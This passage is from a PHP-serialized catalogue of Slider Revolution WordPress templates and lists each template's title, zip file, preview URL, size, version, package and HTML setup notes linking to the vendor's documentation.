JavaScript</a> section of the \"Minimal Menu\" Template you can scroll down to the color change section.<br/>\r\nFor any elements you want to background color change in addition to the sites body, add this class to the <a href=\"https://www.themepunch.com/revslider-doc/layer-attributes/\" target=\"_blank\">Layers Attributes</a> \".tp-colorchange\".<br/><br/>\r\nIf you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:24:\"Minimal Website Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"4\";s:9:\"installed\";b:0;}i:98;a:25:{s:2:\"id\";s:3:\"100\";s:5:\"title\";s:12:\"Minimal Hero\";s:5:\"alias\";s:5:\"rhero\";s:3:\"zip\";s:16:\"packs/r_hero.zip\";s:3:\"uid\";s:32:\"b8b46186956f6e66ad0c08e4532bbbde\";s:3:\"img\";s:17:\"r_hero/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/minimal-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"700\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:890:\"<span class=\"ttm_content\">\r\nIn the <a href=\"https://https://www.themepunch.com/slider-revolution/custom-css-javascript/\" target=\"_blank\">Custom JavaScript</a> section of the \"Minimal Menu\" Template you can scroll down to the color change section.<br/>\r\nFor any elements you want to background color change in addition to the sites body, add this class to the <a href=\"https://www.themepunch.com/revslider-doc/layer-attributes/\" target=\"_blank\">Layers Attributes</a> \".tp-colorchange\".<br/><br/>\r\nIf you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:24:\"Minimal Website Template\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"4\";s:9:\"installed\";b:0;}i:99;a:25:{s:2:\"id\";s:3:\"101\";s:5:\"title\";s:13:\"Minimal About\";s:5:\"alias\";s:7:\"r_about\";s:3:\"zip\";s:17:\"packs/r_about.zip\";s:3:\"uid\";s:32:\"343010c4b4c03f92888c3e9e95bc2bb1\";s:3:\"img\";s:18:\"r_about/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/minimal-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:890:\"<span class=\"ttm_content\">\r\nIn the <a href=\"https://https://www.themepunch.com/slider-revolution/custom-css-javascript/\" target=\"_blank\">Custom JavaScript</a> section of the \"Minimal Menu\" Template you can scroll down to the color change section.<br/>\r\nFor any elements you want to background color change in addition to the sites body, add this class to the <a href=\"https://www.themepunch.com/revslider-doc/layer-attributes/\" target=\"_blank\">Layers Attributes</a> \".tp-colorchange\".<br/><br/>\r\nIf you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:24:\"Minimal Website Template\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"4\";s:9:\"installed\";b:0;}i:100;a:25:{s:2:\"id\";s:3:\"102\";s:5:\"title\";s:16:\"Minimal Products\";s:5:\"alias\";s:10:\"r_products\";s:3:\"zip\";s:20:\"packs/r_products.zip\";s:3:\"uid\";s:32:\"dda93e85c6a4456d132040147f087f39\";s:3:\"img\";s:21:\"r_products/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/minimal-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:4:\"1100\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:890:\"<span class=\"ttm_content\">\r\nIn the <a href=\"https://https://www.themepunch.com/slider-revolution/custom-css-javascript/\" target=\"_blank\">Custom JavaScript</a> section of the \"Minimal Menu\" Template you can scroll down to the color change section.<br/>\r\nFor any elements you want to background color change in addition to the sites body, add this class to the <a href=\"https://www.themepunch.com/revslider-doc/layer-attributes/\" target=\"_blank\">Layers Attributes</a> \".tp-colorchange\".<br/><br/>\r\nIf you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:24:\"Minimal Website Template\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"4\";s:9:\"installed\";b:0;}i:101;a:25:{s:2:\"id\";s:3:\"103\";s:5:\"title\";s:12:\"Minimal Info\";s:5:\"alias\";s:6:\"r_info\";s:3:\"zip\";s:16:\"packs/r_info.zip\";s:3:\"uid\";s:32:\"d6e368e8fd4862174af6c980389ae530\";s:3:\"img\";s:17:\"r_info/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/minimal-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:890:\"<span class=\"ttm_content\">\r\nIn the <a href=\"https://https://www.themepunch.com/slider-revolution/custom-css-javascript/\" target=\"_blank\">Custom JavaScript</a> section of the \"Minimal Menu\" Template you can scroll down to the color change section.<br/>\r\nFor any elements you want to background color change in addition to the sites body, add this class to the <a href=\"https://www.themepunch.com/revslider-doc/layer-attributes/\" target=\"_blank\">Layers Attributes</a> \".tp-colorchange\".<br/><br/>\r\nIf you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:24:\"Minimal Website Template\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"4\";s:9:\"installed\";b:0;}i:102;a:22:{s:2:\"id\";s:3:\"104\";s:5:\"title\";s:18:\"Inspiration Header\";s:5:\"alias\";s:17:\"inspirationheader\";s:3:\"zip\";s:21:\"inspirationheader.zip\";s:3:\"uid\";s:32:\"69f04b2be0b618fa7e184af83b86b7e7\";s:3:\"img\";s:28:\"inspirationheader/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/wordpress-theme-header/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:159:\"<span class=\"ttm_content\">This full-screen hero slider features sequentially animated texts and cool parallax elements.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:300:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background image and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:103;a:22:{s:2:\"id\";s:3:\"105\";s:5:\"title\";s:15:\"Magazine Slider\";s:5:\"alias\";s:13:\"magazineposts\";s:3:\"zip\";s:17:\"magazineposts.zip\";s:3:\"uid\";s:32:\"c562f3457e4edbd030959f7c5e6e0f7c\";s:3:\"img\";s:24:\"magazineposts/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/wordpress-magazine-slider/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.2.6\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:4:\"1000\";s:11:\"description\";s:266:\"<span class=\"ttm_content\">A full-width slider with a mouse-controlled 3D-Parallax effect. Enjoy! <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\">\"Layer Actions\"</a> are used for links on layers.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:277:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:104;a:22:{s:2:\"id\";s:3:\"106\";s:5:\"title\";s:11:\"News Header\";s:5:\"alias\";s:17:\"explorationheader\";s:3:\"zip\";s:21:\"explorationheader.zip\";s:3:\"uid\";s:32:\"8f20d5a868c90ded08b835fb9e8307d7\";s:3:\"img\";s:28:\"explorationheader/slide1.jpg\";s:7:\"preview\";s:56:\"https://revolution.themepunch.com/wordpress-news-header/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.2.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:288:\"<span class=\"ttm_content\">A full-screen slider that is a perfect fit for displaying news on your websites header! Check out <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\">\"Layer Actions\"</a> to add links to buttons.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:277:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:105;a:25:{s:2:\"id\";s:3:\"107\";s:5:\"title\";s:23:\"Minimal Website Package\";s:5:\"alias\";s:23:\"minimal-website-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:23:\"minimal-website-package\";s:3:\"img\";s:31:\"packages/template_group_1_1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/minimal-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"110\";s:11:\"description\";s:181:\"<span class=\"ttm_content\">The Minimal Website Template is a one-pager website with a unique background color change effect on scrolling down.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:890:\"<span class=\"ttm_content\">\r\nIn the <a href=\"https://https://www.themepunch.com/slider-revolution/custom-css-javascript/\" target=\"_blank\">Custom JavaScript</a> section of the \"Minimal Menu\" Template you can scroll down to the color change section.<br/>\r\nFor any elements you want to background color change in addition to the sites body, add this class to the <a href=\"https://www.themepunch.com/revslider-doc/layer-attributes/\" target=\"_blank\">Layers Attributes</a> \".tp-colorchange\".<br/><br/>\r\nIf you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:24:\"Minimal Website Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"4\";s:9:\"installed\";b:0;}i:106;a:25:{s:2:\"id\";s:3:\"108\";s:5:\"title\";s:23:\"Website Builder Package\";s:5:\"alias\";s:22:\"websitebuilder-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:22:\"websitebuilder-package\";s:3:\"img\";s:29:\"packages/template_group_2.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/wordpress-website-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.2.5.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:2:\"60\";s:11:\"description\";s:191:\"<span class=\"ttm_content\">The Website Builder Package is a clean, usable collection website modules that can be used all together or each on their own.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Website Builder\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"3\";s:9:\"installed\";b:0;}i:107;a:25:{s:2:\"id\";s:3:\"109\";s:5:\"title\";s:26:\"Dark Content Block Package\";s:5:\"alias\";s:27:\"dark-fullsite-block-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:27:\"dark-fullsite-block-package\";s:3:\"img\";s:29:\"packages/template_group_4.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/dark-wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">This Minimal Website Template has some sleek parallax effects and on-demand loading modules.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Fullsite Dark\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"2\";s:9:\"installed\";b:0;}i:108;a:25:{s:2:\"id\";s:3:\"110\";s:5:\"title\";s:27:\"Light Content Block Package\";s:5:\"alias\";s:22:\"fullsite-block-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:22:\"fullsite-block-package\";s:3:\"img\";s:29:\"packages/template_group_3.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">This Minimal Website Template has some sleek parallax effects and on-demand loading modules.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:8:\"Fullsite\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"1\";s:9:\"installed\";b:0;}i:109;a:22:{s:2:\"id\";s:3:\"111\";s:5:\"title\";s:17:\"Typewriter Effect\";s:5:\"alias\";s:16:\"typewritereffect\";s:3:\"zip\";s:20:\"typewritereffect.zip\";s:3:\"uid\";s:32:\"d6f8bae06cc4a7b158d680c01e59ddc2\";s:3:\"img\";s:27:\"typewritereffect/slide1.jpg\";s:7:\"preview\";s:62:\"https://revolution.themepunch.com/wordpress-typewriter-effect/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:263:\"<span class=\"ttm_content\">This is the example slider from the Typewriter add-on preview.<br/><a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\">\"Layer Actions\"</a> are used for links on buttons.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:403:\"<span class=\"ttm_content\">This slider template requires the <a href=\"https://www.themepunch.com/slider-revolution/typewriter-addon/\" target=\"_blank\">Typewriter add-on</a> to be installed. Edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:173:\"[{\"path\":\"revslider-typewriter-addon\\/revslider-typewriter-addon.php\",\"name\":\"Typewriter AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/typewriter-addon\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:110;a:22:{s:2:\"id\";s:3:\"112\";s:5:\"title\";s:17:\"Blend Mode Header\";s:5:\"alias\";s:15:\"blendmodeheader\";s:3:\"zip\";s:19:\"blendmodeheader.zip\";s:3:\"uid\";s:32:\"2e44e976596d757aab40ffa28086dcf9\";s:3:\"img\";s:26:\"blendmodeheader/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/blend-mode-hero-header/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:4:\"1000\";s:11:\"description\";s:163:\"<span class=\"ttm_content\">This full-screen hero header with HMTL5 background video, utilizes the new 5.3 blend mode effect.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:300:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background image and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:111;a:25:{s:2:\"id\";s:3:\"113\";s:5:\"title\";s:17:\"Themeplicity Menu\";s:5:\"alias\";s:17:\"themeplicity_menu\";s:3:\"zip\";s:27:\"packs/themeplicity_menu.zip\";s:3:\"uid\";s:32:\"7d5c1e75eaafa63683895a32a62f4ce0\";s:3:\"img\";s:28:\"themeplicity_menu/slide1.jpg\";s:7:\"preview\";s:50:\"https://revolution.themepunch.com/wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:2:\"90\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Themeplicity Website Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"5\";s:9:\"installed\";b:0;}i:112;a:25:{s:2:\"id\";s:3:\"114\";s:5:\"title\";s:19:\"Themeplicity Header\";s:5:\"alias\";s:19:\"themeplicity_header\";s:3:\"zip\";s:29:\"packs/themeplicity_header.zip\";s:3:\"uid\";s:32:\"907091e4d58acc7d12f802de2f280b7d\";s:3:\"img\";s:30:\"themeplicity_header/slide1.jpg\";s:7:\"preview\";s:50:\"https://revolution.themepunch.com/wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:4:\"1000\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Themeplicity Website Template\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"5\";s:9:\"installed\";b:0;}i:113;a:25:{s:2:\"id\";s:3:\"115\";s:5:\"title\";s:18:\"Themeplicity Offer\";s:5:\"alias\";s:18:\"themeplicity_offer\";s:3:\"zip\";s:28:\"packs/themeplicity_offer.zip\";s:3:\"uid\";s:32:\"1bd8f9aa2f3e340449664c65ba17fb51\";s:3:\"img\";s:29:\"themeplicity_offer/slide1.jpg\";s:7:\"preview\";s:50:\"https://revolution.themepunch.com/wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"330\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Themeplicity Website Template\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"5\";s:9:\"installed\";b:0;}i:114;a:25:{s:2:\"id\";s:3:\"116\";s:5:\"title\";s:23:\"Themeplicity What We Do\";s:5:\"alias\";s:21:\"themeplicity_whatwedo\";s:3:\"zip\";s:31:\"packs/themeplicity_whatwedo.zip\";s:3:\"uid\";s:32:\"aa800a44b5a3eab30414dde1f32bfed7\";s:3:\"img\";s:32:\"themeplicity_whatwedo/slide1.jpg\";s:7:\"preview\";s:50:\"https://revolution.themepunch.com/wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"813\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a 